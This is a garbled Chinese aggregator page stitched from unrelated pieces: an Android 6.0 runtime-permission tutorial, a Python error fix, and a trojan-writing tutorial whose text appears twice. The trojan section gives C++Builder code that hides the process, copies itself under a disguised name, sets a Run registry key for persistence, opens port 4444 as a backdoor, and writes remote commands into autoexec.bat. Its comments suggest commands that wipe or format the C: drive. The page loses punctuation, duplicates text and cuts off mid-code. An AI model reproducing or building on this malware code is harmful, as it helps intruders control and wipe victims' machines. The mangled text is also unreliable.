一个新建的Android应用默认是没有权限的,这意味着它不能执行任何可能对用户体验有不利影响的 *** 作或者访问设备数据。为了使用受保护的功能,你必须包含一个或者多个标签在你的app manifest中。
1、Android 60中权限分为两种,普通权限和危险权限(即运行时权限,下面统称运行时权限)。
11普通权限
如果你的应用manifest中只申明了普通权限(也就是说,这些权限对于用户隐私和设备 *** 作不会造成太多危险),系统会自动授予这些权限。
12运行时权限
如果你的应用manifest中声明了运行时权限(也就是说,这些权限可能会影响用户隐私和设备的普通 *** 作),系统会明确的让用户决定是否授予这些权限。系统请求用户授予这些权限的方式是由当前应用运行的系统版本来决定的。
121 Android60及以上的系统
如果你的设备运行的是Android60(API level 23)及以上的系统,并且你的应用的targetSdkVersion也是23或者更高,那么应用向用户请求这些权限是实时的。这意味着用户可以随时取消 这些运行时权限的授权。所以应用在每次需要用到这些运行时权限的时候都需要去检查是否还有这些权限的授权。
122 Android 51及以下的系统
如果你的设备运行在Android51(API level 22)及以下的系统中,或者你的app的targetSdkVersion是22或者更低。系统会请求用户在apk安装的时候授予这些权限。
如果你的应用更新的时候添加了一个权限,系统会在用户更新应用的时候请求用户授予这个权限 , 一旦用户安装了这个应用,唯一可以取消授权的方式就是卸载掉这个应用。 注意这句话的意思,想一下如果app的targetSdkVersion是22或者以下,但是运行在Android60及以上的设备中会有什么问题?后面会分析这个问题 。
常常来说一个授权失败会抛出SecurityException,然而这并不是在 所有情况下都会发生。比如,发送一个广播去检查授权(SendBroadcast(Intent)),数据会被发送给所有接收者,但是当这个方法的请求返 回的时候,你不会收到任何一个因为授权失败抛出的异常,其实在大多数情况下,授权失败只会打印系统日志。
13自动权限调整
简单的说,如果你的app targetSdkVersion是3,而你当前运行的系统版本是4,那么在android version 4 中新添加的权限会自动添加到你的app中。
比如 WRITE_EXTERNAL_STORAGE权限是在api 4的时候添加的,而你的应用的targetSdkVersion是3,那么这个权限会自动添加到你的应用中。而且在官方商店上这个权限也会列出来(尽管可能你并不需要这个权限)。
所以建议经常更新你的targetSdkVersion到最新版本。
下面来回答上面的那个问题,如果app的targetSdkVersion是22或者以下,但是运行在android 60或以上版本的手机中,会发生什么?
安装过程中,会一起请求用户授予所有 权限,如果用户拒绝,将不能安装这个app,只有用户全部同意这些授权,才能安装这个应用,但是问题来了,安装好了这个应用之后,android60以 上的系统中,用户是可以去设置中取消授权的,而且是随时都可以取消,所以很多运行时权限可能也得不到,目前官方的做法是,如果用户取消该项授权,那么依赖 该项授权的方法的返回值为null,所以你的app可能会报空指针异常。以后是否会针对22以下的app做改变还不得而知,毕竟crash是很难让人接受 的,但是crash是由用户造成的,用户应该也可以理解。
2、普通权限和运行时权限
系统权限会被传递给两种不同的保护级别,我们所知道这两种最重要的保护级别就是普通权限和运行时权限。
21 普通权限
普通权限的覆盖区域是在你的app需要访问沙盒以外的数据和资源的时候,但是对用户隐私和其他app的 *** 作只有很少的影响,比如开启手电筒的权限。这个时候,系统会自动授权这些普通权限。
Normal Permissions:
ACCESS_LOCATION_EXTRA_COMMANDS
ACCESS_NETWORK_STATE
ACCESS_NOTIFICATION_POLICY
ACCESS_WIFI_STATE
BLUETOOTH
BLUETOOTH_ADMIN
BROADCAST_STICKY
CHANGE_NETWORK_STATE
CHANGE_WIFI_MULTICAST_STATE
CHANGE_WIFI_STATE
DISABLE_KEYGUARD
EXPAND_STATUS_BAR
GET_PACKAGE_SIZE
INSTALL_SHORTCUT
INTERNET
KILL_BACKGROUND_PROCESSES
MODIFY_AUDIO_SETTINGS
NFC
READ_SYNC_SETTINGS
READ_SYNC_STATS
RECEIVE_BOOT_COMPLETED
REORDER_TASKS
REQUEST_INSTALL_PACKAGES
SET_ALARM
SET_TIME_ZONE
SET_WALLPAPER
SET_WALLPAPER_HINTS
TRANSMIT_IR
UNINSTALL_SHORTCUT
USE_FINGERPRINT
VIBRATE
WAKE_LOCK
WRITE_SYNC_SETTINGS
22 运行时权限
运行时权限的覆盖区域是你的app想要的数据和资源涉及用户的隐私信息,或者是可能潜在的影响用户的存储数据或者其他app的 *** 作。比如,请求获取用户联系人信息的权限。如果一个app申明了运行时权限,用户必须明确的授权这些权限给app。
23 权限组
所有的运行时权限都属于对应的权限组,如果你的app运行在android60及以上系统,下面的规则都适用:
231 如果一个app在manifest中请求了一个运行时权限,而且app还没有得到这个运行时权限所在的权限组中的任何一个运行时权限授权,那么系统会d出一个对话框,描述app想要访问的运行时权限的权限组,这个对话框不会描述这个权限组中某一个特定的权限。比如,你的app想要请求READ_CONTACT权限,对话框只会描述app想要请求设备的联系人,如果用户授权通过,系统会授予app所请求的该项权限。
232 如果一个app在manifest中请求一个运行时权限,并且这个app已经在相同的权限组中有了另一个运行时权限的授权,那么系统不会d出对话框,而是会立即授予app该项运行时权限的授权。比如,一个app之前请求过一个READ_CONTACT的权限并且被授权通过,之后又请求一个WRITE_CONTACT(在同一个权限组)权限,那么系统会自动授予该权限。
其实所有权限(普通权限、运行时权限、用户自定义权限)都属于特定的权限组,但是只有运行时权限的权限组才会影响用户体验。
233运行时权限组和权限组列表
group:androidpermission-groupCONTACTS
permission:androidpermissionWRITE_CONTACTS
permission:androidpermissionGET_ACCOUNTS
permission:androidpermissionREAD_CONTACTS
group:androidpermission-groupPHONE
permission:androidpermissionREAD_CALL_LOG
permission:androidpermissionREAD_PHONE_STATE
permission:androidpermissionCALL_PHONE
permission:androidpermissionWRITE_CALL_LOG
permission:androidpermissionUSE_SIP
permission:androidpermissionPROCESS_OUTGOING_CALLS
permission:comandroidvoicemailpermissionADD_VOICEMAIL
group:androidpermission-groupCALENDAR
permission:androidpermissionREAD_CALENDAR
permission:androidpermissionWRITE_CALENDAR
group:androidpermission-groupCAMERA
permission:androidpermissionCAMERA
group:androidpermission-groupSENSORS
permission:androidpermissionBODY_SENSORS
group:androidpermission-groupLOCATION
permission:androidpermissionACCESS_FINE_LOCATION
permission:androidpermissionACCESS_COARSE_LOCATION
group:androidpermission-groupSTORAGE
permission:androidpermissionREAD_EXTERNAL_STORAGE
permission:androidpermissionWRITE_EXTERNAL_STORAGE
group:androidpermission-groupMICROPHONE
permission:androidpermissionRECORD_AUDIO
group:androidpermission-groupSMS
permission:androidpermissionREAD_SMS
permission:androidpermissionRECEIVE_WAP_PUSH
permission:androidpermissionRECEIVE_MMS
permission:androidpermissionRECEIVE_SMS
permission:androidpermissionSEND_SMS
permission:androidpermissionREAD_CELL_BROADCASTS
可以通过adb shell pm list permissions -d -g进行查看。
看到上面的dangerous permissions,会发现一个问题,好像危险权限都是一组一组的,恩,没错,的确是这样的,那么有个问题:分组对我们的权限机制有什么影响吗?的确是有影响的,如果app运行在Android 6x的机器上,对于授权机制是这样的。如果你申请某个危险的权限,假设你的app早已被用户授权了 同一组 的某个危险权限,那么系统会立即授权,而不需要用户去点击授权。比如你的app对READ_CONTACTS已经授权了,当你的app申请WRITE_CONTACTS时,系统会直接授权通过。此外,对于申请时d出的dialog上面的文本说明也是对整个权限组的说明,而不是单个权限(ps:这个dialog是不能进行定制的)。不过需要注意的是,不要对权限组过多的依赖,尽可能对每个危险权限都进行正常流程的申请,因为在后期的版本中这个权限组可能会产生变化。
3、相关API
31 在AndroidManifest文件中添加需要的权限。
这个步骤和我们之前的开发并没有什么变化,试图去申请一个没有声明的权限可能会导致程序崩溃。
32 检查权限
if (ContextCompatcheckSelfPermission(thisActivity,
ManifestpermissionREAD_CONTACTS)
!= PackageManagerPERMISSION_GRANTED) {
}else{
//
}
这里涉及到一个API,ContextCompatcheckSelfPermission,主要用于检测某个权限是否已经被授予,方法返回值为PackageManagerPERMISSION_DENIED或者PackageManagerPERMISSION_GRANTED。当返回DENIED就需要进行申请授权了
33 申请授权
ActivityCompatrequestPermissions(thisActivity,
new String[]{ManifestpermissionREAD_CONTACTS},
MY_PERMISSIONS_REQUEST_READ_CONTACTS);
该方法是异步的,第一个参数是Context;第二个参数是需要申请的权限的字符串数组;第三个参数为requestCode,主要用于回调的时候检测。可以从方法名requestPermissions以及第二个参数看出,是支持一次性申请多个权限的,系统会通过对话框 逐一 询问用户是否授权。
34 处理权限申请回调
@Override
publicvoidonRequestPermissionsResult(intrequestCode,
String permissions[],int[] grantResults) {
switch(requestCode) {
case MY_PERMISSIONS_REQUEST_READ_CONTACTS: {
// If request is cancelled, the result arrays are empty
if(grantResultslength >0&& grantResults[0] == PackageManagerPERMISSION_GRANTED) {
// permission was granted, yay! Do the contacts-related task you need to do
}else{
// permission denied, boo! Disable the functionality that depends on this permission
}
return;
}
}
}
ok,对于权限的申请结果,首先验证requestCode定位到你的申请,然后验证grantResults对应于申请的结果,这里的数组对应于申请时的第二个权限字符串数组。如果你同时申请两个权限,那么grantResults的length就为2,分别记录你两个权限的申请结果。如果申请成功,就可以做你的事情了!
那么将上述几个步骤结合到一起就是:
// Here, thisActivity is the current activity
if (ContextCompatcheckSelfPermission(thisActivity,
ManifestpermissionREAD_CONTACTS)
!= PackageManagerPERMISSION_GRANTED) {
// Should we show an explanation
if (ActivityCompatshouldShowRequestPermissionRationale(thisActivity,
ManifestpermissionREAD_CONTACTS)) {
// Show an expanation to the user asynchronously -- don't block
// this thread waiting for the user's response! After the user
// sees the explanation, try again to request the permission
} else {
// No explanation needed, we can request the permission
ActivityCompatrequestPermissions(thisActivity,
new String[]{ManifestpermissionREAD_CONTACTS},
MY_PERMISSIONS_REQUEST_READ_CONTACTS);
// MY_PERMISSIONS_REQUEST_READ_CONTACTS is an
// app-defined int constant The callback method gets the
// result of the request
}
}
谢幕,至此有关于android60 以上权限相关的内容已经详细讲完了!
python报错string indices must be integers解决如下:
在py文件中写的data={"a":"123","b":"456"},data类型为dict
而在py文件中通过data= arcpyGetParameter(0) 获取在GP中传过来的参数{"a":"123","b":"456"},data类型为字符串。
所以在后续的py中用到的data['a']就会报如上错误。
解决方法:
data= arcpyGetParameter(0)
data=jsonloads(data) //将字符串转成json格式,或 data=eval(data) //将字符串转成dict格式。
扩展资料:
程序错误是指在软件运行中因为程序本身有错误而造成的功能不正常、死机、数据丢失、非正常中断等现象。
系统程序错误是指系统程序本身有错误而造成的功能不正常、死机或中断等现象。有些系统程序错误会造成计算机安全隐患,此时叫做系统漏洞。
系统程序错误是指在系统软件运行中因为系统程序本身有错误而造成的功能不正常、死机、数据丢失、非正常中断等现象。
有些系统程序错误会造成计算机安全隐患,此时叫做系统漏洞。系统程序错误是程序错误的一种,相对于应用程序错误,系统程序错误造成影响要大得很多,系统程序错误有时会使整个计算机系统崩溃或报废。
参考资料来源:百度百科:系统程序错误
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60dll吗?
启动C++Builder 50企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32DLL中的鸟函数了。
首先判断目标机的 *** 作系统是Win9x还是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到 *** 作系统的版本号
if (dwVersion >= 0x80000000)
// *** 作系统是Win9x,不是WinNt
{
typedef DWORD (CALLBACK LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
//定义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
//得到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
//执行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
//卸载动态链接库
}
}
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断 *** 作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。
接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:
{
char TempPath[MAX_PATH];
//定义一个变量
GetSystemDirectory(TempPath ,MAX_PATH);
//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径
SystemPath=AnsiString(TempPath);
//格式化TempPath字符串,使之成为能供编译器使用的样式
CopyFile(ParamStr(0)c_str(), AnsiString(SystemPath+"\\Tapi32exe")c_str() ,FALSE);
//将自己拷贝到%System%目录下,并改名为Tapi32exe,伪装起来
Registry=new TRegistry;
//定义一个TRegistry对象,准备修改注册表,这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//设置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE);
//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之
try
{
//如果以下语句发生异常,跳至catch,以避免程序崩溃
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32exe");
//查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32exe
//如果不是,就写入以上键值和内容
}
catch()
{
//如果有错误,什么也不做
}
}
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:
{
FILE fp=NULL;
char content;
int times_of_try;
char TempFile[MAX_PATH];
//定义了一堆待会儿要用到的变量
sprintf(TempFile, "%s%2
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60dll吗?
启动C++Builder 50企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32DLL中的鸟函数了。
首先判断目标机的 *** 作系统是Win9x还是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到 *** 作系统的版本号
if (dwVersion >= 0x80000000)
// *** 作系统是Win9x,不是WinNt
{
typedef DWORD (CALLBACK LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定/义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://加/载RegisterServiceProcess()函数所在的动态链接库KERNEL32DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得/到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://执/行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
file://卸/载动态链接库
}
}
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断 *** 作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:
C:\Windows\System,并修改注册表,以便启动时自动加载:
{
char TempPath[MAX_PATH];
file://定/义一个变量
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath/是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径
SystemPath=AnsiString(TempPath);
file://格/式化TempPath字符串,使之成为能供编译器使用的样式
CopyFile(ParamStr(0)c_str(), AnsiString(SystemPath+"\\Tapi32exe")c_str() ,FALSE);
file://将/自己拷贝到%System%目录下,并改名为Tapi32exe,伪装起来
Registry=new TRegistry;
file://定/义一个TRegistry对象,准备修改注册表,这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://设/置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打/开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之
try
{
file://如/果以下语句发生异常,跳至catch,以避免程序崩溃
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32exe");
file://查/找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32exe
file://如/果不是,就写入以上键值和内容
}
catch()
{
file://如/果有错误,什么也不做
}
}
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:
{
FILE fp=NULL;
char content;
int times_of_try;
char TempFile[MAX_PATH];
file://定/义了一堆待会儿要用到的变量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369BAT"))c_str());
file://在%System%下/建立一个文本文件Win369bat,作为临时文件使用
AnsiString temp=Socket->ReceiveText();
file://接/收客户端(攻击者,也就是你自己)传来的数据
}
好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexecbat和Configsys吧:
{
if(tempSubString(0,9)=="edit conf")
file://如/果接受到的字符串的前9个字符是“edit conf”
{
int number=tempLength();
file://得/到字符串的长度
int file_name=atoi((tempSubString(11,1))c_str());
file://将/第11个字符转换成integer型,存入file_name变量
file://为/什么要取第11个字符,因为第10个字符是空格字符
content=(tempSubString(12,number-11)+'\n')c_str();
file://余/下的字符串将被作为写入的内容写入目标文件
FILE fp=NULL;
char filename[20];
chmod("c:\\autoexecbat",S_IREAD|S_IWRITE);
chmod("c:\\configsys",S_IREAD|S_IWRITE);
file://将/两个目标文件的属性改为可读可写
if(file_name==1)
sprintf(filename,"%s","c:\\autoexecbat");
file://如/果第11个字符是1,就把Autoexecbat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\configsys");
file://如/果第11个字符是1,就把Configsys格式化
times_of_try=0;
file://定/义计数器
while(fp==NULL)
{
file://如/果指针是空
fp=fopen(filename,"a+");
file://如/果文件不存在,创建之;如果存在,准备在其后添加
file://如/果出错,文件指针为空,这样就会重复
times_of_try=times_of_try+1;
file://计/数器加1
if(times_of_try>100)
{
file://如/果已经试了100次了,仍未成功
Socket->SendText("Fail By Open File");
file://就/发回“Fail By Open File”的错误信息
goto END;
file://跳/至END处
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://写/入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!
fclose(fp);
file://写/完后关闭目标文件
Socket->SendText("Sucess");
file://然/后发回“Success”的成功信息
}
}
你现在可以通过网络来察看目标机上的这两个文件了,并且还可以向里面随意添加任何命令。
以上就是关于简单的木马怎么编写啊全部的内容,包括:简单的木马怎么编写啊、什么是黑客什么是电脑病毒是怎么作的、聊聊Android6.0 以上系统权限等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)